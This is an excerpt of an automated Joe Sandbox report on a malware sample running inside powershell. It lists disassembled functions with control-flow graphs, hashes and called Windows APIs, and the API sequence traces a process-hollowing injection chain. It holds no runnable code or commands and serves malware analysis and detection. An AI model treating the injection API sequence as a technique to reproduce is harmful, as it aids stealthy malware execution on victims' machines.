                                            control_flow_graph 1141 7ffd343ee0c8-7ffd343f0b28 NtUnmapViewOfSection 1146 7ffd343f0b2a 1141->1146 1147 7ffd343f0b30-7ffd343f0b4c 1141->1147 1146->1147
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 0dc52daa855a0d5f8b8deb6acbdcb132a5620989d1d8eb4b79ec18cb9c48fb03
                                            • Instruction ID: 120b090b5532333ad1703a5a044a32a76ea467ec99b9561bb9bfa105429bee53
                                            • Opcode Fuzzy Hash: 0dc52daa855a0d5f8b8deb6acbdcb132a5620989d1d8eb4b79ec18cb9c48fb03
                                            • Instruction Fuzzy Hash: 9B217371A0CA088FDB58DF9CD8567E97BE0EB5A320F04416FD049D3252DA74A856CB91
                                            Function 00007FFD343EE142 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1148 7ffd343ee142-7ffd343f10c2 NtResumeThread 1152 7ffd343f10ca-7ffd343f10e6 1148->1152 1153 7ffd343f10c4 1148->1153 1153->1152
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 5c64ce90b26c0245c61d8c00e30addf05d1236baea9a134fa7762220fde6eddf
                                            • Instruction ID: 82b44f1170be5c87e414c7f54f0e4814c189ca5e411fb6d1cbd937aa10fcc4c2
                                            • Opcode Fuzzy Hash: 5c64ce90b26c0245c61d8c00e30addf05d1236baea9a134fa7762220fde6eddf
                                            • Instruction Fuzzy Hash: F9217F71A08A1C8FDF58EF9CD889BEABBF1EB59311F04416AD409D3255DB70A8428B91
                                            Function 00007FFD343F0F40 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1154 7ffd343f0f40-7ffd343f0fd8 NtSetContextThread 1158 7ffd343f0fda 1154->1158 1159 7ffd343f0fe0-7ffd343f0ffc 1154->1159 1158->1159
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: 393bd975abb0dc9022c651b09fed7b913efbe9edbcff2410e94465a8033bf3e0
                                            • Instruction ID: 82910c0cd9a67f310e0c873ade08393d30bbe04370ecb415c1ca1f26fa5928da
                                            • Opcode Fuzzy Hash: 393bd975abb0dc9022c651b09fed7b913efbe9edbcff2410e94465a8033bf3e0
                                            • Instruction Fuzzy Hash: 39218031A0CA4C8FDB58EF9CD8867E97BF0EB5A320F04416BD049D3252CA759846CB91
                                            Function 00007FFD343EE122 Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction ID: 966b70a68b5d3b025633e9b9aa3243191711b24e8b0be5fe34fd50efbe606c25
                                            • Opcode Fuzzy Hash: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction Fuzzy Hash: 61216271A08A0C8FDF58EF9CD84A7F977E4EB59321F00412ED04DD3256DA75A846CB91
                                            Function 00007FFD343EE132 Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThread
                                            • String ID:
                                            • API String ID: 1591575202-0
                                            • Opcode ID: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction ID: 966b70a68b5d3b025633e9b9aa3243191711b24e8b0be5fe34fd50efbe606c25
                                            • Opcode Fuzzy Hash: e8367fcb7246de5fc202db9e548cbfc1e24a7f1ed60d1d05e10fc51027702633
                                            • Instruction Fuzzy Hash: 61216271A08A0C8FDF58EF9CD84A7F977E4EB59321F00412ED04DD3256DA75A846CB91
                                            Function 00007FFD344B0001 Relevance: 4.1, Instructions: 4088COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7a0d4ce34952a64f72db081151ab8f0a6082eb4d959badaaca2d98a352ecf42
                                            • Instruction ID: 0558feb0ec04d891c0b0ff411090a498dabef40b2c234248d365f7041eee1fd9
                                            • Opcode Fuzzy Hash: d7a0d4ce34952a64f72db081151ab8f0a6082eb4d959badaaca2d98a352ecf42
                                            • Instruction Fuzzy Hash: EF53E371A0CB844FDB65EB2C84A5A6577D0FFAA700F0505AED48DC7296DE74EC42CB82
                                            Function 00007FFD344B00DD Relevance: 3.6, Instructions: 3615COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c253b76c867c23dff643c54bc3987986678e0b26379aa63087b5d9dddeb2b42
                                            • Instruction ID: 3d665766a5e7824035791dedb016df626948eec6db8d81a5a671517273ff7b87
                                            • Opcode Fuzzy Hash: 7c253b76c867c23dff643c54bc3987986678e0b26379aa63087b5d9dddeb2b42
                                            • Instruction Fuzzy Hash: C443C171A0CB484FDB65EB2C84A6AA577D0FFA9700F0505AED489C7296DE74FC41CB81
                                            Function 00007FFD343F0690 Relevance: 1.8, APIs: 1, Instructions: 316processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 990 7ffd343f0690-7ffd343f0712 994 7ffd343f0714-7ffd343f0723 990->994 995 7ffd343f0770-7ffd343f07a2 990->995 994->995 996 7ffd343f0725-7ffd343f0728 994->996 1002 7ffd343f07a4-7ffd343f07b3 995->1002 1003 7ffd343f0800-7ffd343f0851 995->1003 997 7ffd343f072a-7ffd343f073d 996->997 998 7ffd343f0762-7ffd343f076a 996->998 1000 7ffd343f0741-7ffd343f0754 997->1000 1001 7ffd343f073f 997->1001 998->995 1000->1000 1005 7ffd343f0756-7ffd343f075e 1000->1005 1001->1000 1002->1003 1004 7ffd343f07b5-7ffd343f07b8 1002->1004 1011 7ffd343f0853-7ffd343f0862 1003->1011 1012 7ffd343f08af-7ffd343f08e0 1003->1012 1006 7ffd343f07ba-7ffd343f07cd 1004->1006 1007 7ffd343f07f2-7ffd343f07fa 1004->1007 1005->998 1009 7ffd343f07d1-7ffd343f07e4 1006->1009 1010 7ffd343f07cf 1006->1010 1007->1003 1009->1009 1013 7ffd343f07e6-7ffd343f07ee 1009->1013 1010->1009 1011->1012 1014 7ffd343f0864-7ffd343f0867 1011->1014 1018 7ffd343f08e2-7ffd343f08ea 1012->1018 1019 7ffd343f08ee-7ffd343f096e CreateProcessA 1012->1019 1013->1007 1016 7ffd343f0869-7ffd343f087c 1014->1016 1017 7ffd343f08a1-7ffd343f08a9 1014->1017 1020 7ffd343f0880-7ffd343f0893 1016->1020 1021 7ffd343f087e 1016->1021 1017->1012 1018->1019 1022 7ffd343f0976-7ffd343f09a6 call 7ffd343f09cf 1019->1022 1023 7ffd343f0970 1019->1023 1020->1020 1024 7ffd343f0895-7ffd343f089d 1020->1024 1021->1020 1023->1022 1024->1017
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 9cd26b09a0ad80a24359a74cad74a14e6074c2938e5eb480be414ec8e7aedb64
                                            • Instruction ID: 1c29ec0c68d38ac364f235334ea593a30069dc4f4bd8e7b3388f6478162927f1
                                            • Opcode Fuzzy Hash: 9cd26b09a0ad80a24359a74cad74a14e6074c2938e5eb480be414ec8e7aedb64
                                            • Instruction Fuzzy Hash: FAA19230A18E4D8FEB68EF2CC8567E977E1FF59300F10426AD85DC7291DB7894858B82
                                            Function 00007FFD343EEB89 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1027 7ffd343eeb89-7ffd343eebff 1031 7ffd343eec5a-7ffd343eecd7 CreateFileMappingW 1027->1031 1032 7ffd343eec01-7ffd343eec10 1027->1032 1039 7ffd343eecd9 1031->1039 1040 7ffd343eecdf-7ffd343eed0e call 7ffd343eed37 1031->1040 1032->1031 1033 7ffd343eec12-7ffd343eec15 1032->1033 1034 7ffd343eec17-7ffd343eec2a 1033->1034 1035 7ffd343eec4f-7ffd343eec57 1033->1035 1037 7ffd343eec2c 1034->1037 1038 7ffd343eec2e-7ffd343eec41 1034->1038 1035->1031 1037->1038 1038->1038 1041 7ffd343eec43-7ffd343eec4b 1038->1041 1039->1040 1041->1035
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateFileMapping
                                            • String ID:
                                            • API String ID: 524692379-0
                                            • Opcode ID: 6a8a05096acaddd492290e4cbeb0d29b1f76a0fd8b9e56a266b6100fdf1794f5
                                            • Instruction ID: 4995fb2767e51ec153e24559bce61ad6271cb25b75c957029e2a4415c33ee727
                                            • Opcode Fuzzy Hash: 6a8a05096acaddd492290e4cbeb0d29b1f76a0fd8b9e56a266b6100fdf1794f5
                                            • Instruction Fuzzy Hash: DB518435618A4D8FDB58EF2CC8567E977E1FB68311F14426AE85EC3391CE74E8818B81
                                            Function 00007FFD343EE919 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1045 7ffd343ee919-7ffd343ee977 1049 7ffd343ee979-7ffd343ee988 1045->1049 1050 7ffd343ee9d2-7ffd343eea6a CreateFileA 1045->1050 1049->1050 1051 7ffd343ee98a-7ffd343ee98d 1049->1051 1057 7ffd343eea6c 1050->1057 1058 7ffd343eea72-7ffd343eeaa1 call 7ffd343eeaca 1050->1058 1052 7ffd343ee9c7-7ffd343ee9cf 1051->1052 1053 7ffd343ee98f-7ffd343ee9a2 1051->1053 1052->1050 1055 7ffd343ee9a6-7ffd343ee9b9 1053->1055 1056 7ffd343ee9a4 1053->1056 1055->1055 1059 7ffd343ee9bb-7ffd343ee9c3 1055->1059 1056->1055 1057->1058 1059->1052
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 88d1176fa28fe8645310f3a493061d0aad96a196e38234ebee689acf28bca1b8
                                            • Instruction ID: 78264f9e9292c22a2fa5b16a2da3ba803d4fa7fa44888ff5464be83750a31401
                                            • Opcode Fuzzy Hash: 88d1176fa28fe8645310f3a493061d0aad96a196e38234ebee689acf28bca1b8
                                            • Instruction Fuzzy Hash: 82516430A18A4D8FDBA8EF18D8557E977E1FB68311F14427AE94DC3355CB78E8818B81
                                            Function 00007FFD343EED86 Relevance: 1.6, APIs: 1, Instructions: 135fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1063 7ffd343eed86-7ffd343eed93 1064 7ffd343eed95-7ffd343eed9d 1063->1064 1065 7ffd343eed9e-7ffd343eedaf 1063->1065 1064->1065 1066 7ffd343eedba-7ffd343eee71 MapViewOfFile 1065->1066 1067 7ffd343eedb1-7ffd343eedb9 1065->1067 1071 7ffd343eee79-7ffd343eee96 1066->1071 1072 7ffd343eee73 1066->1072 1067->1066 1072->1071
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0
                                            • Opcode ID: a96ef1bcdc255a2b12948dc3158e54e99013ac64cda942723e65c3bcd18bcd74
                                            • Instruction ID: 47ea10ca14117e378badc2243131a0d6615f3bda713aaea5d5d83458a35e0082
                                            • Opcode Fuzzy Hash: a96ef1bcdc255a2b12948dc3158e54e99013ac64cda942723e65c3bcd18bcd74
                                            • Instruction Fuzzy Hash: 0E41283190CA889FDB19EB68D8566E97BF0FF57321F14026ED089D3292CB74A846C791
                                            Function 00007FFD343EE7C8 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1073 7ffd343ee7c8-7ffd343ee7cf 1074 7ffd343ee7da-7ffd343ee890 K32GetModuleInformation 1073->1074 1075 7ffd343ee7d1-7ffd343ee7d9 1073->1075 1079 7ffd343ee898-7ffd343ee8c7 1074->1079 1080 7ffd343ee892 1074->1080 1075->1074 1080->1079
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            • String ID:
                                            • API String ID: 3425974696-0
                                            • Opcode ID: 623f8e89c952da440c8d9acf774e06a1fd22e4937fda2784a9b6b8bcb328cf58
                                            • Instruction ID: 6b4351c27f68110dd6ac14f55536d7f0d7b9d3968773c246bed80bd26815b132
                                            • Opcode Fuzzy Hash: 623f8e89c952da440c8d9acf774e06a1fd22e4937fda2784a9b6b8bcb328cf58
                                            • Instruction Fuzzy Hash: F631E831D0CA484FDB18EB9C98466F9BBE1EB66321F04427FD049D3692CB756846C791
                                            Function 00007FFD34669E8D Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3064631410.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: I'_H
                                            • API String ID: 0-3212710135
                                            • Opcode ID: 8c860e281548d6cd3f6ab295ef613cf97c16d536c0cc414c9f4ef229e1371dcf
                                            • Instruction ID: 2b8ceaee00fc6c17da6d81316a7be0936014c1ef0134914c7c514e43297e6a25
                                            • Opcode Fuzzy Hash: 8c860e281548d6cd3f6ab295ef613cf97c16d536c0cc414c9f4ef229e1371dcf
                                            • Instruction Fuzzy Hash: F4F02E13F0DA690BFBA1965C34A61F5A7C1DFA663074801B7DA4CD7352DC0D6C1E0381
                                            Function 00007FFD344B2760 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 463d2661a3a09e44e3834693db823dae55f3f1dda5ec378b198b3665318861e2
                                            • Instruction ID: 1698a3224f4f474ed925b548c57266c06f46e25aa13fc5d88d26ea0eb3b02d68
                                            • Opcode Fuzzy Hash: 463d2661a3a09e44e3834693db823dae55f3f1dda5ec378b198b3665318861e2
                                            • Instruction Fuzzy Hash: 11212253B0E9860FE2A8A56C18FD2A466C0FF6A340B1901BED59DD31C3DC9D2C059395
                                            Function 00007FFD34669E71 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3064631410.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0343abb4d3577703f01529dce70228fd85f8926a2ef707a6fd5ded95c44b9d3
                                            • Instruction ID: e045976c01422dbaa19a81520de3f492d6f107cb9930fc45c41ecde96be433a5
                                            • Opcode Fuzzy Hash: e0343abb4d3577703f01529dce70228fd85f8926a2ef707a6fd5ded95c44b9d3
                                            • Instruction Fuzzy Hash: FEF0B433B199360FE3519A48589A1E9F390FF552307450177CA0DD7196DE1DAC2A9680

                                            Execution Graph

                                            Execution Coverage:1.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:1446
                                            Total number of Limit Nodes:7
                                            execution_graph 8768 1780dd2ad48 8769 1780dd29324 __CxxCallCatchBlock 9 API calls 8768->8769 8770 1780dd2ad7d 8769->8770 8771 1780dd29324 __CxxCallCatchBlock 9 API calls 8770->8771 8772 1780dd2ad8b __except_validate_context_record 8771->8772 8773 1780dd29324 __CxxCallCatchBlock 9 API calls 8772->8773 8774 1780dd2adcf 8773->8774 8775 1780dd29324 __CxxCallCatchBlock 9 API calls 8774->8775 8776 1780dd2add8 8775->8776 8777 1780dd29324 __CxxCallCatchBlock 9 API calls 8776->8777 8778 1780dd2ade1 8777->8778 8791 1780dd2993c 8778->8791 8781 1780dd2ae11 __CxxCallCatchBlock 8783 1780dd29978 __CxxCallCatchBlock 9 API calls 8781->8783 8782 1780dd29324 __CxxCallCatchBlock 9 API calls 8782->8781 8788 1780dd2aec2 8783->8788 8784 1780dd2aeeb __CxxCallCatchBlock 8785 1780dd29324 __CxxCallCatchBlock 9 API calls 8784->8785 8786 1780dd2aefe 8785->8786 8787 1780dd29324 __CxxCallCatchBlock 9 API calls 8786->8787 8789 1780dd2af07 8787->8789 8788->8784 8790 1780dd28ff8 __CxxCallCatchBlock 9 API calls 8788->8790 8790->8784 8792 1780dd29324 __CxxCallCatchBlock 9 API calls 8791->8792 8794 1780dd2994d 8792->8794 8793 1780dd29958 8796 1780dd29324 __CxxCallCatchBlock 9 API calls 8793->8796 8794->8793 8795 1780dd29324 __CxxCallCatchBlock 9 API calls 8794->8795 8795->8793 8797 1780dd29969 8796->8797 8797->8781 8797->8782 7576 1780dd34848 7579 1780dd2904c 7576->7579 7580 1780dd29076 7579->7580 7581 1780dd29064 7579->7581 7595 1780dd29324 7580->7595 7581->7580 7582 1780dd2906c 7581->7582 7584 1780dd29074 7582->7584 7586 1780dd29324 __CxxCallCatchBlock 9 API calls 7582->7586 7585 1780dd2907b 7585->7584 7588 1780dd29324 __CxxCallCatchBlock 9 API calls 7585->7588 7587 1780dd2909b 7586->7587 7589 1780dd29324 __CxxCallCatchBlock 9 API calls 7587->7589 7588->7584 7590 1780dd290a8 7589->7590 7598 1780dd2c2f4 7590->7598 7601 1780dd29340 7595->7601 7597 1780dd2932d 7597->7585 7626 1780dd2cab0 7598->7626 7600 1780dd2c2fd 7602 1780dd29358 7601->7602 7603 1780dd2935f GetLastError 7601->7603 7602->7597 7613 1780dd29c8c 7603->7613 7617 1780dd29aac 7613->7617 7618 1780dd29b96 TlsGetValue 7617->7618 7623 1780dd29af0 __vcrt_InitializeCriticalSectionEx 7617->7623 7619 1780dd29b1e LoadLibraryExW 7621 1780dd29b3f GetLastError 7619->7621 7622 1780dd29bbd 7619->7622 7620 1780dd29bdd GetProcAddress 7620->7618 7621->7623 7622->7620 7624 1780dd29bd4 FreeLibrary 7622->7624 7623->7618 7623->7619 7623->7620 7625 1780dd29b61 LoadLibraryExW 7623->7625 7624->7620 7625->7622 7625->7623 7634 1780dd2cb10 7626->7634 7628 1780dd2cabe 7628->7600 7629 1780dd2cab9 7629->7628 7630 1780dd2cae8 FlsGetValue 7629->7630 7632 1780dd2cae4 7629->7632 7630->7632 7631 1780dd2cafe 7631->7600 7632->7631 7643 1780dd2c940 GetLastError 7632->7643 7635 1780dd2cb59 GetLastError 7634->7635 7637 1780dd2cb2f __free_lconv_num 7634->7637 7636 1780dd2cb6c 7635->7636 7639 1780dd2cb8a SetLastError 7636->7639 7640 1780dd2cb87 7636->7640 7642 1780dd2c940 _invalid_parameter_noinfo 11 API calls 7636->7642 7638 1780dd2cb54 7637->7638 7641 1780dd2c940 _invalid_parameter_noinfo 11 API calls 7637->7641 7638->7629 7639->7638 7640->7639 7641->7638 7642->7640 7644 1780dd2c966 7643->7644 7645 1780dd2c96c SetLastError 7644->7645 7661 1780dd2d220 7644->7661 7646 1780dd2c9e5 7645->7646 7646->7631 7649 1780dd2c9a5 FlsSetValue 7652 1780dd2c9c8 7649->7652 7653 1780dd2c9b1 FlsSetValue 7649->7653 7650 1780dd2c995 FlsSetValue 7668 1780dd2d2a0 7650->7668 7674 1780dd2c758 7652->7674 7654 1780dd2d2a0 __free_lconv_num 7 API calls 7653->7654 7660 1780dd2c9c6 SetLastError 7654->7660 7660->7646 7666 1780dd2d231 _invalid_parameter_noinfo 7661->7666 7662 1780dd2d282 7682 1780dd2d1f4 7662->7682 7663 1780dd2d266 HeapAlloc 7665 1780dd2c987 7663->7665 7663->7666 7665->7649 7665->7650 7666->7662 7666->7663 7679 1780dd2b470 7666->7679 7669 1780dd2d2a5 HeapFree 7668->7669 7671 1780dd2c9a3 7668->7671 7670 1780dd2d2c0 GetLastError 7669->7670 7669->7671 7672 1780dd2d2cd __free_lconv_num 7670->7672 7671->7645 7673 1780dd2d1f4 __free_lconv_num 11 API calls 7672->7673 7673->7671 7691 1780dd2c630 7674->7691 7685 1780dd2b4c0 7679->7685 7683 1780dd2cb10 __free_lconv_num 13 API calls 7682->7683 7684 1780dd2d1fd 7683->7684 7684->7665 7690 1780dd2c558 EnterCriticalSection 7685->7690 7703 1780dd2c558 EnterCriticalSection 7691->7703 8798 1780dd3494f 8799 1780dd34968 8798->8799 8800 1780dd3495e 8798->8800 8802 1780dd2c5ac LeaveCriticalSection 8800->8802 7705 1780dd2824c 7707 1780dd28270 __scrt_release_startup_lock 7705->7707 7706 1780dd2b581 7707->7706 7708 1780dd2cb10 __free_lconv_num 13 API calls 7707->7708 7709 1780dd2b5aa 7708->7709 8332 1780dd25fcc 8335 1780dd25fd3 8332->8335 8333 1780dd26000 VirtualProtect 8334 1780dd26029 GetLastError 8333->8334 8336 1780dd25f10 8333->8336 8334->8336 8335->8333 8335->8336 9066 1780dd286d0 9067 1780dd290c0 __std_exception_copy 38 API calls 9066->9067 9068 1780dd286f9 9067->9068 8337 1780dd319d0 8340 1780dd2e864 8337->8340 8341 1780dd2e8b6 8340->8341 8342 1780dd2e871 8340->8342 8346 1780dd2cacc 8342->8346 8344 1780dd2e8a0 8351 1780dd2e53c 8344->8351 8347 1780dd2cae8 FlsGetValue 8346->8347 8349 1780dd2cae4 8346->8349 8347->8349 8348 1780dd2cafe 8348->8344 8349->8348 8350 1780dd2c940 _invalid_parameter_noinfo 13 API calls 8349->8350 8350->8348 8374 1780dd2e7ac 8351->8374 8356 1780dd2e58e 8356->8341 8357 1780dd2c5d0 14 API calls 8358 1780dd2e59f 8357->8358 8359 1780dd2e5a7 8358->8359 8361 1780dd2e5b6 8358->8361 8360 1780dd2d2a0 __free_lconv_num 13 API calls 8359->8360 8360->8356 8361->8361 8393 1780dd2e8e0 8361->8393 8364 1780dd2e6b2 8365 1780dd2d1f4 __free_lconv_num 13 API calls 8364->8365 8366 1780dd2e6b7 8365->8366 8368 1780dd2d2a0 __free_lconv_num 13 API calls 8366->8368 8367 1780dd2e70d 8370 1780dd2e774 8367->8370 8404 1780dd2e05c 8367->8404 8368->8356 8369 1780dd2e6cc 8369->8367 8372 1780dd2d2a0 __free_lconv_num 13 API calls 8369->8372 8371 1780dd2d2a0 __free_lconv_num 13 API calls 8370->8371 8371->8356 8372->8367 8375 1780dd2e7cf 8374->8375 8380 1780dd2e7d9 8375->8380 8419 1780dd2c558 EnterCriticalSection 8375->8419 8381 1780dd2e571 8380->8381 8383 1780dd2cacc 14 API calls 8380->8383 8386 1780dd2e22c 8381->8386 8384 1780dd2e8a0 8383->8384 8385 1780dd2e53c 56 API calls 8384->8385 8385->8381 8387 1780dd2dd78 14 API calls 8386->8387 8388 1780dd2e240 8387->8388 8389 1780dd2e25e 8388->8389 8390 1780dd2e24c GetOEMCP 8388->8390 8391 1780dd2e273 8389->8391 8392 1780dd2e263 GetACP 8389->8392 8390->8391 8391->8356 8391->8357 8392->8391 8394 1780dd2e22c 16 API calls 8393->8394 8395 1780dd2e91b 8394->8395 8396 1780dd2ea71 8395->8396 8397 1780dd2e958 IsValidCodePage 8395->8397 8403 1780dd2e972 8395->8403 8398 1780dd28070 _invalid_parameter_noinfo 8 API calls 8396->8398 8397->8396 8399 1780dd2e969 8397->8399 8400 1780dd2e6a9 8398->8400 8401 1780dd2e998 GetCPInfo 8399->8401 8399->8403 8400->8364 8400->8369 8401->8396 8401->8403 8420 1780dd2e344 8403->8420 8493 1780dd2c558 EnterCriticalSection 8404->8493 8421 1780dd2e38f GetCPInfo 8420->8421 8422 1780dd2e485 8420->8422 8421->8422 8428 1780dd2e3a2 8421->8428 8423 1780dd28070 _invalid_parameter_noinfo 8 API calls 8422->8423 8425 1780dd2e524 8423->8425 8425->8396 8431 1780dd31474 8428->8431 8430 1780dd31938 33 API calls 8430->8422 8432 1780dd2dd78 14 API calls 8431->8432 8433 1780dd314b6 8432->8433 8434 1780dd2ec58 MultiByteToWideChar 8433->8434 8436 1780dd314ec 8434->8436 8435 1780dd314f3 8438 1780dd28070 _invalid_parameter_noinfo 8 API calls 8435->8438 8436->8435 8437 1780dd2c5d0 14 API calls 8436->8437 8439 1780dd315b0 8436->8439 8442 1780dd3151c 8436->8442 8437->8442 8440 1780dd2e419 8438->8440 8439->8435 8441 1780dd2d2a0 __free_lconv_num 13 API calls 8439->8441 8446 1780dd31938 8440->8446 8441->8435 8442->8439 8443 1780dd2ec58 MultiByteToWideChar 8442->8443 8444 1780dd31592 8443->8444 8444->8439 8445 1780dd31596 GetStringTypeW 8444->8445 8445->8439 8447 1780dd2dd78 14 API calls 8446->8447 8448 1780dd3195d 8447->8448 8451 1780dd31604 8448->8451 8452 1780dd31645 8451->8452 8453 1780dd2ec58 MultiByteToWideChar 8452->8453 8456 1780dd3168f 8453->8456 8454 1780dd3190d 8455 1780dd28070 _invalid_parameter_noinfo 8 API calls 8454->8455 8457 1780dd2e44c 8455->8457 8456->8454 8458 1780dd2c5d0 14 API calls 8456->8458 8460 1780dd316c7 8456->8460 8471 1780dd317c5 8456->8471 8457->8430 8458->8460 8459 1780dd2d2a0 __free_lconv_num 13 API calls 8459->8454 8461 1780dd2ec58 MultiByteToWideChar 8460->8461 8460->8471 8462 1780dd3173a 8461->8462 8462->8471 8482 1780dd2f218 8462->8482 8464 1780dd3176d 8465 1780dd317d6 8464->8465 8466 1780dd31785 8464->8466 8464->8471 8467 1780dd2c5d0 14 API calls 